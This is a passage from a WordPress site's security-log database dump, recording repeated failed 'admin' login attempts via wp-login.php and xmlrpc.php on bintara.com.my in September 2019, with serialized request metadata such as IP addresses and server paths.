Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"34542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6Ql4PBR0Qpy6701fcKkgAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567527063.9763\";s:12:\"REQUEST_TIME\";s:10:\"1567527063\";}}','notice','2019-09-03 16:11:05','2019-09-03 16:11:04',18202576,19501664,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.168.151'),(23627,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.102.244\";s:11:\"REMOTE_PORT\";s:5:\"48782\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6VpoPBR0Qpy6701fcM5QAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567528358.0897\";s:12:\"REQUEST_TIME\";s:10:\"1567528358\";}}','notice','2019-09-03 16:32:39','2019-09-03 16:32:38',17688480,19179096,'https://bintara.com.my/wp-login.php',1,0,'195.154.102.244'),(23628,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.102.244\";s:11:\"REMOTE_PORT\";s:5:\"48905\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6VqIPBR0Qpy6701fcM5wAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567528361.0343\";s:12:\"REQUEST_TIME\";s:10:\"1567528361\";}}','notice','2019-09-03 16:32:42','2019-09-03 16:32:41',18204200,19502960,'https://bintara.com.my/xmlrpc.php',1,0,'195.154.102.244'),(23629,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.108.189\";s:11:\"REMOTE_PORT\";s:5:\"56632\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6Z64PBR0Qpy6701fcPmAAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567529451.2319\";s:12:\"REQUEST_TIME\";s:10:\"1567529451\";}}','notice','2019-09-03 16:50:52','2019-09-03 16:50:51',17685088,19176912,'https://bintara.com.my/wp-login.php',1,0,'142.93.108.189'),(23630,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.108.189\";s:11:\"REMOTE_PORT\";s:5:\"56916\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6Z7oPBR0Qpy6701fcPnQAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567529454.3403\";s:12:\"REQUEST_TIME\";s:10:\"1567529454\";}}','notice','2019-09-03 16:50:55','2019-09-03 16:50:54',18202824,19503056,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.108.189'),(23631,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.88.244.233\";s:11:\"REMOTE_PORT\";s:5:\"55980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6eY4PBR0Qpy6701fcRhAAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567530595.1106\";s:12:\"REQUEST_TIME\";s:10:\"1567530595\";}}','notice','2019-09-03 17:09:56','2019-09-03 17:09:55',17685624,19176792,'https://bintara.com.my/wp-login.php',1,0,'52.88.244.233'),(23632,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.88.244.233\";s:11:\"REMOTE_PORT\";s:5:\"56316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6eZoPBR0Qpy6701fcRhwAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567530598.2051\";s:12:\"REQUEST_TIME\";s:10:\"1567530598\";}}','notice','2019-09-03 17:09:59','2019-09-03 17:09:58',18203088,19499536,'https://bintara.com.my/xmlrpc.php',1,0,'52.88.244.233'),(23633,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.56.221.195\";s:11:\"REMOTE_PORT\";s:5:\"43326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6jVYaPUx8kPlNBlL1GqQAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567531861.9747\";s:12:\"REQUEST_TIME\";s:10:\"1567531861\";}}','notice','2019-09-03 17:31:03','2019-09-03 17:31:02',17685160,19176912,'https://bintara.com.my/wp-login.php',1,0,'212.56.221.195'),(23634,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.56.221.195\";s:11:\"REMOTE_PORT\";s:5:\"43678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6jWdRCUhS5Yos@KbVa4gAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567531867.5747\";s:12:\"REQUEST_TIME\";s:10:\"1567531867\";}}','notice','2019-09-03 17:31:08','2019-09-03 17:31:07',18202536,19501384,'https://bintara.com.my/xmlrpc.php',1,0,'212.56.221.195'),(23618,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 